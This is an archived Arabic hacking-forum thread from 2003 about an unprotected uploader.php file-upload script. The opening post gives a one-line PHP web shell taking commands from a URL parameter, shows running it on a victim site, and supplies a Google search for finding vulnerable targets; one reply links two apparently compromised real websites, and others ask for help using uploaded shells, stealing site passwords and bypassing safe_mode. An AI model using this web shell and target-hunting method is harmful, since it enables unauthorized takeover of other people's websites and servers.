المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : uploader.php vulnerability


hi_HaCkEr
18-05-2003, 03:38
هي ثغرة في برنامج uploader.php وهو متوفر باصدارة 1.1 وتسمح لك برفع اي ملف اوحتى سكربتات php

وتستطيع تحميله من http://www.phpscriptcenter.com/uploader.php

الاسكربت من اسمه يتضح بانه يعطيك ميزة رفع ملفات لموقعك مباشرة لكن (( بوجود باسورد ))

طيب اذا لم يكن محمى بباسوورد اذا السيرفر كله سيصبح تحت سيطرتك اذا لم يكن في حالة safe_mode اما اذا كان سيف مود فالموقع فقط سيصبح تحت سيطرتك
اذا حملت الملف لموقعك فقم بتغيير الباسوورد وتستطيع عمل ذلك من ملف setup.php


open setup.php and edit these options افتح الملف واستعرض هذا الاعدادات
--------------------------------------------------------------------------------------
$ADMIN[RequirePass] = "Yes"; // Checks to see if upload has a vaild
password
$ADMIN[Password] = "password"; // This is the password if the above قم بتغيير الباسوورد من هناااا
option is Yes
$ADMIN[UploadNum] = "5"; // Number of upload feilds to put on the html عدد الملفات
page
$ADMIN[directory] = "uploads"; // The directory the files will be
uploaded to (must be chmoded to 777) اسم مجلد الملف اتركه كما هو او غيره فلك الخيار
----------------------------------------------------------------------------------------

طبعا ان لم يكن الملف محمي بباسوورد فتستطيع تحميل اي ملف وسيكون بداخل مجلد uploads
فاذا رفعنها مثلا هذا الاسكربت

<?php
$cmd = $_GET["cmd"];
system("$cmd");
?>
سنصل للـ cmd ونستطيع تنفيذ اوامر على السيرفر ...... etc
فاذا نفذنا
http://www.victim.com/uploads/shellemul.php?cmd=id
سيكون الناتج مثلا
uid=21(apache) gid=21(apache) groups=21(apache)

طبعا هذا سكربت بسيط ولمزيد من الرفاهية ارفع سكربت الشل او اي سكربت مماثل له واستمتع ( ان لم يكن السيرفر في حالة سيف مود)

طريقة البحث عن هذه الثغرة

ابحث في جوجل متبعا هذه الطريقة
allinurl: uploader.php
وسترى النتائج

وختاما اتمنى ان يكون الموضوع مفيدا للجميع

وتقبلوا تحيات محبكم

/////////////////////////////////
الكاتب / hi_HaCkEr
/////////////////////////////////

أتمنى نقل الموضوع للفائدة ولكن بشرط ان يذكر المصدر

C Y

TaZ HaCkEr
18-05-2003, 04:45
مشكور يالغالي ...

انت مدرسة وحنا طلابك

وجزاك الله خير

TaZ HaCkEr
18-05-2003, 04:46
نسيت اقولك شي :D

سويت حركة تعلمتها منكم

شوف هنا

http://www.hundezubehoer.de/wihphoto/start.php

TaZ HaCkEr
18-05-2003, 04:56
وهنا
http://www.kirschental.de/bilder/start.php

hi_HaCkEr
11-08-2003, 06:42
والشباب ما عرفوا الموضوع بعد

شافوا العنوان انجليزي ولا واحد دخل :D

ولو عرفوا المحتوى الله يعيييييين

|4|

الهاوي
11-08-2003, 11:56
والله حلو الشرح

ومنكم نستفيد


يعطيك العافيــه يالغـــالي


ثانكس|4|

Linux-root
11-08-2003, 12:44
:Dبس عندي استفسار الحين انا رفعت ال hpshell
كيف ادخل عليه :D

رفعته بس ماعرف وين راح بالموقع او الرابط حقه

وسؤال ثاني وش الامر الي اكتبه ويعطيني الباسوورد للموقع :D


ونشالله ماكون مثقل عليكم :D

hosiny
12-08-2003, 04:45
انا مثل الاخ ازعاج...ارجو يا هاي هاكر شرح هذه الطريقه بتفصيل اكبر حيث اني لا اعرف ايضا ماذا افعل بعد رفع هذا الاسكربت و كيفية تنفيذ اوامره و من اين...ارجو عدم اهمال الرد...
ايضا كيف استفيد من phpshell و كيف انفذ اوامره بعد رفعه لاي موقع

arab_hak
14-08-2003, 09:44
يمين بالله ماني فاهم ولاشئئئئئئئئئئئئئئ

ReD_BoY
15-08-2003, 02:34
مرحبا

يوجد ملفين هل أرفع الأثنين أم setup فقط هل أعطية أمتداد php أم htm

SSS4EVER
15-08-2003, 07:50
والله اخوي مافهمت ولا شيء

ياليت لو القليل من التوضيح

دعباس
15-08-2003, 08:29
ياسلام عليك هاي هكر شرح ولا اروع يعنى لو كان مو محمي بالباسورد يكون السيرفر كامل :eek:

واذا فيه باسورد الموقع فقط شي ررررررررهيب بالمره :eek:

وسالفه السيف مود مثل ماسمعت فى طريقه على تخطيها بس ممنوع شرحها هنا


فعلا بالتوفيق من الله ومنتديات العاصفه الطريق الى الاحتراف :)


سلام

wassem
15-08-2003, 03:34
:D:D:D ممكن تشرح طريقة استثمار الثغرة بشكل ابسط

SSS4EVER
15-08-2003, 05:12
اخوي هاي هكر
ممكن الشرح و التوضيح
يعني اذا ماعليك امر
نبي الخطوات حبه حبه

ويعطيك العافيه اخوي على الشرح

أبو ذر
12-11-2003, 11:19
ياسلام ............ صحيح مبدع
الى الأمام أخوي

Fix0r
12-11-2003, 06:29
شكرا اخي hi_HaCkEr
لطرحك للثغره
________________________________________________

وتوضيح للشباب بعد اذنك:
هذا برنامج uploader.php هو برنامج يركبه صاحب الموقع على موقعه
ليتيح للزائرين او الأعضاء رفع ملفاتهم من اجهزتهم الى الموقع.

يعني تقدر ترفع صوره او برنامج او اي شي
بس في بعض المواقع تضع لك امتدادت معينه لترفعها من خلال هذا البرنامج
مثلا يسمح لك فقط برفع الملفات التي بالامتداد الاتي: . gif او jpg او zip
وفي بعض المواقع لا تقم بتحديد اي شي يعني التحميل مفتوح

وفي هذه المواقع تقوم برفع phpshill.php وتقوم بالتحكم بالموقع كامل وتستطيع التحكم بالسيرفر لو ما كان سيف مود.

وايضا هناك من يضع باسوورد لمنع الزائرين من استعمال البرنامج والسماح فقط لمن يحمل الباسوورد باستخدام البرنامج
في هذه الحاله دورلك على موقع ثاني.

ارجو ان اكون قد وضحت بشكل جيد..|1|

تحياتي..

EVIL-MASTER
12-11-2003, 11:45
جميل منك اخى هاى هكر انك شرحت الموضوع بتفاصيله البرمجية
وتسمح لى انى ارد بالنيابة عنك
بالنسبة لاثتثمار الصغرة فالمجموعة كتبت درس خاص بذلك على الوصلة:
تعلم اختراق السرفرات مع* Unit-X Team * (للمبتدئين) (http://www.3asfh.com/vb/showthread.php?s=&threadid=5465&perpage=15&pagenumber=1)
وبالنسبة لتخطى الساف مود الاخ هاى هكر تكرم وكتب الدرس من فترةعلى الوصلة:
السيف مود ( ما هو وكيفيفة تخطيه وكيفية تفعيله على السيرفر) (http://www.3asfh.com/vb/showthread.php?s=&threadid=4544)

Q8_VaMp1
13-11-2003, 09:01
هع...والله انك خطير:D تسلم وانشالله اطبقها بس بعد ماتعلم الشيل والادوات الثانيه:)